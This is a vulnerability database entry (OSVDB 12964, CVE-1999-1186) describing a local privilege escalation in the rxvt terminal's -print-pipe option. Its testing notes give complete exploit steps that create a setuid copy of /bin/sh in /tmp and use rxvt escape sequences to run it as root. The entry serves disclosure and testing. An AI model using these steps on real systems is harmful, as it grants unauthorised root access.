Linux rxvt -print-pipe Local Privilege Escalation

1995-04-01T00:00:00
ID OSVDB:12964
Type osvdb
Reporter OSVDB
Modified 1995-04-01T00:00:00

Description

Manual Testing Notes

  1. Set DISPLAY environment variable if necessary so you can use x clients.
  2. In user shell: $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug $ chmod +x /tmp/rxbug $ rxvt -print-pipe /tmp/rxbug
  3. In rxvt xclient: $ cat ESC[5i ESC[4i (The client will close at this point with a broken pipe)
  4. $ /tmp/rxsh # whoami root #

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/1996_1/0000.html ISS X-Force ID: 425 CVE-1999-1186